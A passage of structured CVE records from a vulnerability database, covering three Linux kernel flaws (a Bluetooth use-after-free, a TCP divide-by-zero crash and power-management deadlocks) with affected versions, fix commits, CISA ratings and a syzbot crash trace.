"value": "bt_sock_recvmsg in net/bluetooth/af_bluetooth.c in the Linux kernel through 6.6.8 has a use-after-free because of a bt_sock_ioctl race condition."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T21:06:56.480871",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/torvalds/linux/commit/2e07e8348ea454615e268222ae3fc240421be768"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3841-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-51779",
"datePublished": "2023-12-25T00:00:00",
"dateReserved": "2023-12-25T00:00:00",
"dateUpdated": "2024-08-29T18:54:00.210Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36905 (GCVE-0-2024-36905)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-04 09:11
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tcp: defer shutdown(SEND_SHUTDOWN) for TCP_SYN_RECV sockets
TCP_SYN_RECV state is really special, it is only used by
cross-syn connections, mostly used by fuzzers.
In the following crash [1], syzbot managed to trigger a divide
by zero in tcp_rcv_space_adjust()
A socket makes the following state transitions,
without ever calling tcp_init_transfer(),
meaning tcp_init_buffer_space() is also not called.
TCP_CLOSE
connect()
TCP_SYN_SENT
TCP_SYN_RECV
shutdown() -> tcp_shutdown(sk, SEND_SHUTDOWN)
TCP_FIN_WAIT1
To fix this issue, change tcp_shutdown() to not
perform a TCP_SYN_RECV -> TCP_FIN_WAIT1 transition,
which makes no sense anyway.
When tcp_rcv_state_process() later changes socket state
from TCP_SYN_RECV to TCP_ESTABLISH, then look at
sk->sk_shutdown to finally enter TCP_FIN_WAIT1 state,
and send a FIN packet from a sane socket state.
This means tcp_send_fin() can now be called from BH
context, and must use GFP_ATOMIC allocations.
[1]
divide error: 0000 [#1] PREEMPT SMP KASAN NOPTI
CPU: 1 PID: 5084 Comm: syz-executor358 Not tainted 6.9.0-rc6-syzkaller-00022-g98369dccd2f8 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024
RIP: 0010:tcp_rcv_space_adjust+0x2df/0x890 net/ipv4/tcp_input.c:767
Code: e3 04 4c 01 eb 48 8b 44 24 38 0f b6 04 10 84 c0 49 89 d5 0f 85 a5 03 00 00 41 8b 8e c8 09 00 00 89 e8 29 c8 48 0f af c3 31 d2 <48> f7 f1 48 8d 1c 43 49 8d 96 76 08 00 00 48 89 d0 48 c1 e8 03 48
RSP: 0018:ffffc900031ef3f0 EFLAGS: 00010246
RAX: 0c677a10441f8f42 RBX: 000000004fb95e7e RCX: 0000000000000000
RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
RBP: 0000000027d4b11f R08: ffffffff89e535a4 R09: 1ffffffff25e6ab7
R10: dffffc0000000000 R11: ffffffff8135e920 R12: ffff88802a9f8d30
R13: dffffc0000000000 R14: ffff88802a9f8d00 R15: 1ffff1100553f2da
FS: 00005555775c0380(0000) GS:ffff8880b9500000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f1155bf2304 CR3: 000000002b9f2000 CR4: 0000000000350ef0
Call Trace:
<TASK>
tcp_recvmsg_locked+0x106d/0x25a0 net/ipv4/tcp.c:2513
tcp_recvmsg+0x25d/0x920 net/ipv4/tcp.c:2578
inet6_recvmsg+0x16a/0x730 net/ipv6/af_inet6.c:680
sock_recvmsg_nosec net/socket.c:1046 [inline]
sock_recvmsg+0x109/0x280 net/socket.c:1068
____sys_recvmsg+0x1db/0x470 net/socket.c:2803
___sys_recvmsg net/socket.c:2845 [inline]
do_recvmmsg+0x474/0xae0 net/socket.c:2939
__sys_recvmmsg net/socket.c:3018 [inline]
__do_sys_recvmmsg net/socket.c:3041 [inline]
__se_sys_recvmmsg net/socket.c:3034 [inline]
__x64_sys_recvmmsg+0x199/0x250 net/socket.c:3034
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xf5/0x240 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7faeb6363db9
Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 c1 17 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffcc1997168 EFLAGS: 00000246 ORIG_RAX: 000000000000012b
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007faeb6363db9
RDX: 0000000000000001 RSI: 0000000020000bc0 RDI: 0000000000000005
RBP: 0000000000000000 R08: 0000000000000000 R09: 000000000000001c
R10: 0000000000000122 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000000001 R15: 0000000000000001
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "34e41a031fd7",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "ed5e279b69e0",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "413c33b9f3bc",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "2552c9d9440f",
"status": "affected",
"version": "1da177e4c3f",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "3fe4ef0568a4",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "f47d0d32fa94",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "cbf232ba11bc",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "94062790aedb",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4.20",
"status": "unaffected",
"version": "4.19.314",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.11",
"status": "unaffected",
"version": "5.10.217",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.16",
"status": "unaffected",
"version": "5.15.159",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.2",
"status": "unaffected",
"version": "6.1.91",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.7",
"status": "unaffected",
"version": "6.6.31",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.9"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:2.6.12:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.5",
"status": "unaffected",
"version": "5.4.276",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.9",
"status": "unaffected",
"version": "6.8.10",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36905",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-19T18:00:22.813648Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-01-14T16:43:30.740Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"url": "https://github.com/cisagov/vulnrichment/issues/130"
},
{
"url": "https://www.openwall.com/lists/oss-security/2024/11/12/4"
},
{
"url": "https://alas.aws.amazon.com/cve/html/CVE-2024-36905.html"
},
{
"url": "https://access.redhat.com/security/cve/cve-2024-36905"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-11-12T19:02:41.493Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/34e41a031fd7523bf1cd00a2adca2370aebea270"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ed5e279b69e007ce6c0fe82a5a534c1b19783214"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/413c33b9f3bc36fdf719690a78824db9f88a9485"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2552c9d9440f8e7a2ed0660911ff00f25b90a0a4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3fe4ef0568a48369b1891395d13ac593b1ba41b1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f47d0d32fa94e815fdd78b8b88684873e67939f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cbf232ba11bc86a5281b4f00e1151349ef4d45cf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/94062790aedb505bdda209b10bea47b294d6394f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240905-0005/"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/10/29/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/10/30/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/11/12/4"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/11/12/5"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/11/12/6"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/tcp.c",
"net/ipv4/tcp_input.c",
"net/ipv4/tcp_output.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "34e41a031fd7523bf1cd00a2adca2370aebea270",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ed5e279b69e007ce6c0fe82a5a534c1b19783214",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "413c33b9f3bc36fdf719690a78824db9f88a9485",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2552c9d9440f8e7a2ed0660911ff00f25b90a0a4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3fe4ef0568a48369b1891395d13ac593b1ba41b1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f47d0d32fa94e815fdd78b8b88684873e67939f4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cbf232ba11bc86a5281b4f00e1151349ef4d45cf",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "94062790aedb505bdda209b10bea47b294d6394f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/tcp.c",
"net/ipv4/tcp_input.c",
"net/ipv4/tcp_output.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: defer shutdown(SEND_SHUTDOWN) for TCP_SYN_RECV sockets\n\nTCP_SYN_RECV state is really special, it is only used by\ncross-syn connections, mostly used by fuzzers.\n\nIn the following crash [1], syzbot managed to trigger a divide\nby zero in tcp_rcv_space_adjust()\n\nA socket makes the following state transitions,\nwithout ever calling tcp_init_transfer(),\nmeaning tcp_init_buffer_space() is also not called.\n\n TCP_CLOSE\nconnect()\n TCP_SYN_SENT\n TCP_SYN_RECV\nshutdown() -\u003e tcp_shutdown(sk, SEND_SHUTDOWN)\n TCP_FIN_WAIT1\n\nTo fix this issue, change tcp_shutdown() to not\nperform a TCP_SYN_RECV -\u003e TCP_FIN_WAIT1 transition,\nwhich makes no sense anyway.\n\nWhen tcp_rcv_state_process() later changes socket state\nfrom TCP_SYN_RECV to TCP_ESTABLISH, then look at\nsk-\u003esk_shutdown to finally enter TCP_FIN_WAIT1 state,\nand send a FIN packet from a sane socket state.\n\nThis means tcp_send_fin() can now be called from BH\ncontext, and must use GFP_ATOMIC allocations.\n\n[1]\ndivide error: 0000 [#1] PREEMPT SMP KASAN NOPTI\nCPU: 1 PID: 5084 Comm: syz-executor358 Not tainted 6.9.0-rc6-syzkaller-00022-g98369dccd2f8 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024\n RIP: 0010:tcp_rcv_space_adjust+0x2df/0x890 net/ipv4/tcp_input.c:767\nCode: e3 04 4c 01 eb 48 8b 44 24 38 0f b6 04 10 84 c0 49 89 d5 0f 85 a5 03 00 00 41 8b 8e c8 09 00 00 89 e8 29 c8 48 0f af c3 31 d2 \u003c48\u003e f7 f1 48 8d 1c 43 49 8d 96 76 08 00 00 48 89 d0 48 c1 e8 03 48\nRSP: 0018:ffffc900031ef3f0 EFLAGS: 00010246\nRAX: 0c677a10441f8f42 RBX: 000000004fb95e7e RCX: 0000000000000000\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\nRBP: 0000000027d4b11f R08: ffffffff89e535a4 R09: 1ffffffff25e6ab7\nR10: dffffc0000000000 R11: ffffffff8135e920 R12: ffff88802a9f8d30\nR13: dffffc0000000000 R14: ffff88802a9f8d00 R15: 1ffff1100553f2da\nFS: 00005555775c0380(0000) GS:ffff8880b9500000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f1155bf2304 CR3: 000000002b9f2000 CR4: 0000000000350ef0\nCall Trace:\n \u003cTASK\u003e\n tcp_recvmsg_locked+0x106d/0x25a0 net/ipv4/tcp.c:2513\n tcp_recvmsg+0x25d/0x920 net/ipv4/tcp.c:2578\n inet6_recvmsg+0x16a/0x730 net/ipv6/af_inet6.c:680\n sock_recvmsg_nosec net/socket.c:1046 [inline]\n sock_recvmsg+0x109/0x280 net/socket.c:1068\n ____sys_recvmsg+0x1db/0x470 net/socket.c:2803\n ___sys_recvmsg net/socket.c:2845 [inline]\n do_recvmmsg+0x474/0xae0 net/socket.c:2939\n __sys_recvmmsg net/socket.c:3018 [inline]\n __do_sys_recvmmsg net/socket.c:3041 [inline]\n __se_sys_recvmmsg net/socket.c:3034 [inline]\n __x64_sys_recvmmsg+0x199/0x250 net/socket.c:3034\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xf5/0x240 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7faeb6363db9\nCode: 28 00 00 00 75 05 48 83 c4 28 c3 e8 c1 17 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007ffcc1997168 EFLAGS: 00000246 ORIG_RAX: 000000000000012b\nRAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007faeb6363db9\nRDX: 0000000000000001 RSI: 0000000020000bc0 RDI: 0000000000000005\nRBP: 0000000000000000 R08: 0000000000000000 R09: 000000000000001c\nR10: 0000000000000122 R11: 0000000000000246 R12: 0000000000000000\nR13: 0000000000000000 R14: 0000000000000001 R15: 0000000000000001"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:11:47.697Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/34e41a031fd7523bf1cd00a2adca2370aebea270"
},
{
"url": "https://git.kernel.org/stable/c/ed5e279b69e007ce6c0fe82a5a534c1b19783214"
},
{
"url": "https://git.kernel.org/stable/c/413c33b9f3bc36fdf719690a78824db9f88a9485"
},
{
"url": "https://git.kernel.org/stable/c/2552c9d9440f8e7a2ed0660911ff00f25b90a0a4"
},
{
"url": "https://git.kernel.org/stable/c/3fe4ef0568a48369b1891395d13ac593b1ba41b1"
},
{
"url": "https://git.kernel.org/stable/c/f47d0d32fa94e815fdd78b8b88684873e67939f4"
},
{
"url": "https://git.kernel.org/stable/c/cbf232ba11bc86a5281b4f00e1151349ef4d45cf"
},
{
"url": "https://git.kernel.org/stable/c/94062790aedb505bdda209b10bea47b294d6394f"
},
{
"url": "https://www.openwall.com/lists/oss-security/2024/10/29/1"
}
],
"title": "tcp: defer shutdown(SEND_SHUTDOWN) for TCP_SYN_RECV sockets",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36905",
"datePublished": "2024-05-30T15:29:06.046Z",
"dateReserved": "2024-05-30T15:25:07.067Z",
"dateUpdated": "2025-05-04T09:11:47.697Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52498 (GCVE-0-2023-52498)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 07:38
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
PM: sleep: Fix possible deadlocks in core system-wide PM code
It is reported that in low-memory situations the system-wide resume core
code deadlocks, because async_schedule_dev() executes its argument
function synchronously if it cannot allocate memory (and not only in
that case) and that function attempts to acquire a mutex that is already
held. Executing the argument function synchronously from within
dpm_async_fn() may also be problematic for ordering reasons (it may
cause a consumer device's resume callback to be invoked before a
requisite supplier device's one, for example).
Address this by changing the code in question to use
async_schedule_dev_nocall() for scheduling the asynchronous
execution of device suspend and resume functions and to directly
run them synchronously if async_schedule_dev_nocall() returns false.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:20.585Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f46eb832389f162ad13cb780d0b8cde93641990d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a1d62c775b07213c73f81ae842424c74dd14b5f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e1c9d32c98309ae764893a481552d3f99d46cb34"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e681e29d1f59a04ef773296e4bebb17b1b79f8fe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9bd3dce27b01c51295b60e1433e1dadfb16649f7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7839d0078e0d5e6cc2fa0b0dfbee71de74f1e557"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52498",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:57:20.713823Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:51.225Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/base/power/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f46eb832389f162ad13cb780d0b8cde93641990d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a1d62c775b07213c73f81ae842424c74dd14b5f0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e1c9d32c98309ae764893a481552d3f99d46cb34",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e681e29d1f59a04ef773296e4bebb17b1b79f8fe",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9bd3dce27b01c51295b60e1433e1dadfb16649f7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7839d0078e0d5e6cc2fa0b0dfbee71de74f1e557",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/base/power/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
